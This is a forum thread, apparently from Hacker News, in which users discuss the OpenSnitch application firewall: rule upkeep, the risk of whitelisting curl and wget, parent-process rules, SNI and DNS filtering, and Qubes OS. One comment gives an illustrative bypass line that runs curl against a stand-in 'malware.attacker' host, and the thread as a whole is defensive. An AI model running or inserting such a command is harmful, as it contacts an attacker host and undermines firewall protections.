I've tried to use it extensively (as an interactive firewall). However there are just some problems (that are not the fault of OpenSnitch) that I'm not even sure that are even solvable.
For example, supposed I run `curl` on the terminal, I can either always decide on a case-by-case basis to allow it thru, or I'm required to whitelist it permanently. Once I've whitelisted generic tools like `curl` or `wget`, then the floodgates are really open, since any malware that have compromised my machine can just use `curl` or `wget` to get to the internet without hitting the firewall.
I’ve found that by using subdomain wildcards and/or subnets, I build up a stable set of rules pretty quickly and then only have to review requests to new endpoints once in awhile.
To me, the peace of mind knowing that I’ll be prompted to allow new access is worth the initial hassle. And once the habit is built, it’s pretty easy to manage.
Editing to add: I also use expiring rules regularly. Maybe I trust an installer and want to let it do its thing. So I open it up with a rule for the executable expiring in the near future (options include: forever, until reboot, for the next 30s, for the next 5 mins, etc). This can drastically simplify some tasks if there are a large number of endpoints for some reason and avoids leaving a hole open permanently.
IMO - requires a ton of work. Adoption requires updating rules quite often
Sounds like that varies widely by person/use case. I’ve been using this software for a couple years at this point. I don’t have to update rules all that often (usually a few rules/week), and when I do, it’s usually a 10-30 second detour. The only time it takes more work is if I don’t know why something is trying to connect. But that’s exactly the scenario I’m targeting, i.e. calling attention to the weird looking connections.
My use cases are general productivity, development on side projects and a variety of software experiments, gaming, and some local AI stuff.
I also don’t see this as a ton of work. Rules are 99% pre-configured for you and all you have to do is choose the scope and duration of the rule and whether to reject or allow.
I’ll admit it’s annoying once in awhile if there’s a major update to software that spawns a bunch of new rules, but once I get past the feeling of being annoyed, it’s really an extremely simple and quick process.
Really have to emphasize the habit creation part. After I stuck with it for a few weeks, it became second nature and I stopped getting annoyed for the most part. I consider this a worthwhile habit to build if you’re trying lots of code/libraries and want to know what’s phoning where.
Genuinely curious: how/why does that seem too often? I truly don’t understand. Have you seen the user experience and what’s involved?
How do you feel about other common permission prompts, e.g. location, microphone, camera, share your screen, run as privileged user, etc? I appreciate being asked about those things and I put this in a similar category.
I don't mind configuring things, my dotfiles are the product of 25 years of tweaking. But having to tweak anything multiple times per day is not going to help me work, it is going to hinder my work.
I highly recommend you look at the UX before drawing any conclusions in that case, because what you’re describing does not resemble the OpenSnitch UX.
The experience is much closer to the other common permission prompts I mentioned which is why I asked how you feel about them.
As a fellow multi-decade dotfile tweaker, that experience isn’t comparable and is not a good model for judging this tool.
OK, thanks, I'll give it a shot then. Thank you for insisting ))
Worth a shot! The first few days are by far the worst while all of the existing connections are accounted for, but things calm down quickly.
One thing I wished I knew sooner was that the square [+] button on the rule dialog opens more fields on the form for editing.
This makes it super easy to create a single wildcard rule e.g. when timesyncd tries to hit an ntp server for the first time, I expand the autogenerated rule that pops up to include all subdomains like *.ntp.domain.tld so I don’t have to keep creating rules for the other ntp servers. I’ve gotten more efficient over time this way.
Great, thanks, noted.
A few rules per week sounds like a lot. I think I am not paranoid enough to micromanage my connections like this.
Generally I don't get many prompts day to day, if I do it's because something has changed or I'm using a new application and I find it comforting to know what's going on.
You can make rules based on host, process arguments, etc so it's pretty flexible for allowing stuff you consider safe and staying out the way.
Long ago I used zonealarm on windows and it's a pretty similar ux to that.
I still use firejail or docker for anything that might be sketchy, but it's been super interesting seeing what trusted applications are doing. For example I was a bit shocked that the gnome calculator app was making network requests but it turned out it was for currency exchange rates.
In terms of time spent, that amounts to about one minute per week for me right now. Sometimes less.
The user experience is streamlined, and adding rules involves responding to a dialog that automatically pops up when a connection is attempted. UX is key here and this would be a very different story if you had to go into a separate rule management interface every time.
Regarding paranoia, I don’t see it that way. Supply chain attacks are alive and well, and if you’re running other people’s code on a regular basis, this is a low cost precautionary measure. I totally recognize that not everyone has the same risk profile or tolerance.
I have found it makes me less paranoid, which is good.
In using it for a while, I have only found a few pieces of software trying to access places I don't expect and don't approve of (quite a few more that I do expect, but don't approve of). And none of them seemed to be actively malicious, just misbehaved or poorly configured.
I wonder if there's a way to configure it so that when the parent cmd is a trusted command (say, a bash/zsh owned by the user), it could let the curl command through and otherwise block it. But yeah, that seems like a bit of a hassle.
Then any process can do `system(“bash -c curl malware.attacker”)`
The bash command line wouldn't be the same as the one launched by your terminal, though. But yes, I’m sure there are myriad exploits around something like that.
What could work instead is something where you run a command like `opensnitch-context dev` and it would talk to the running daemon to do proper authentication ("do you want to allow this context to be used?") and then hopefully some other magic (cgroups?) to know if the processes are part of that context even if they are sparse/nested child processes.
You'd need a firewall that is not just TCP/UDP-aware, but HTTP(S)-aware, and a way for your firewall to sniff on TLS-encrypted traffic.
Or be ok with filtering HTTP/TLS traffic based on the domain only, as that part isn't encrypted (the SNI [Server Name Indication]). OpenSnitch should be able to allow/disallow based on that, rather than having to decrypt the TLS part.
Unless it’s using Encrypted SNI.
https://www.cloudflare.com/en-gb/learning/ssl/what-is-encryp...
Or, also, not using SNI at all.
But still, you can probably correlate DNS requests with connections to IP addresses in many cases. Although if the program uses DNS over HTTPS (DoH) like several programs do now then the DNS record is also not known.
The solution that worked for me was to switch to Qubes OS, where everything runs in VMs with strong hardware-assisted isolation.
I switched from Qubes OS to Fedora+Flatpak+Opensnitch. Couldn't make it to run Wayland on my hybrid GPU system (Nvidia). QubesOS drained battery very quickly and since graphics is afaik software rendered, I've gotten into problems in watching HD videos (e. g. a lot of dropped frames on Youtube).
Yes, this is accurate (for security reasons). However you still should not have serious problems with Youtube: https://forum.qubes-os.org/t/hd-video-playback-on-qubes-os-o... (see also a few next posts).
How to fix it if you do have problems: https://forum.qubes-os.org/t/improve-video-playback-performa...
Why did you need Wayland on Qubes?
It doesn’t pin to PID? What if I rename a program to something that has been whitelisted?
Kiboneu wrote:
That's a valid question. It should allow/disallow executables by hashing the executable file (not even the device id + inode), not by comparing the paths. Also pinning the PID also isn't good, since pid is temporary.
Including the path? If you can do that, there's bigger problems than the outgoing network communications.
Might be the same but what if you allow all curl/wget traffic for 'dev' user, but continue to flag any traffic for 'normal' user
for dev work run 'su -c curl … dev'
But if malicious program in normal user space is running, then app firewall flags curl and wget use appropriately.
It would be annoying to input password every time so maybe setup PAM to use yubikey or biometric? Also make sure this user cannot login and does not have a password.
dev user might be the one you want to protect the best in order to detect some supply chain issues.
a sudo like wrapper for this could be pretty cool.
still will capture when processes unexpectedly try to connect to the network for the first time and there is some value in that. even if the popups aren't great.
I'm early in my Linux journey. Would it be a good approach to symlink bash to some new name, say, snitch, then do
Is there a better way without writing code?samlinnfer wrote:
Those problems are solvable. Some "big" EDRs, which happen to work in a similar way, allow to declare the parent/child relationship of the executables to block, i.e. it should be possible to declare that if "curl" is spawned, and if by walking the parent list we encounter a process called "/usr/bin/trusted", then allow this curl invocation. This action would allow running "curl" from bash scripts, as long as the bash script has "/usr/bin/trusted" as a parent.
so don't do that. problem solved
I wish OpenSnitch had a temporary allow feature for things like:
- allow a specific parent structure, e.g. when the python interpreter is invoked by a different parent command
- allow a specific process ID temporarily until the process is killed (both with allowing/disallowing child processes)
- allow a specific target port range for games, and not only a specific port in the rulesets.
...because I feel that 99% of the annoying dialogues could have been avoided with this.
It's the filter configured per user, or is it system-wide? I know you can filter per-user with IP tables and whatever the newer one is, but I haven't dug that deep into open snitch. Maybe a single trusted user account without a login that you could su into? I wonder if you could also whitelist a VM process and spin up single-use VM sandboxes to use when you want to do a bunch of work like that.
Definitely a minor hassle to set up compared to just saying yes or no to permissions, but it's not complicated, if it works.
You can install a unrestricted version with a new name and alias wget and curl to that in interactive shells
This sounds rather silly. If this is really a concern, then "curl" or "wget" can be renamed. I use an application level firewall on mobile and I do not "whitelist" names of programs, I "whitelist" access to certain domain names/IP addresses by certain programs.
The easiest way to stop programs/malware from phoning home IME is to deny access to DNS. I have been doing this for decades and it still works flawlessly. "99%" of the time programs/malware that phone home rely on DNS, not "hard-coded" IP addresses. And it is quite easy for me to detect the rare case of a program/malware that does not need DNS.
With DNS I "whitelist" certain domain names. In fact today I do not even use a locally-served zone file with the IP addresses I need (the whitelist); a forward proxy handles the domain to IP address mapping, the whitelist loaded by the proxy is a text file, like a zone file but simpler.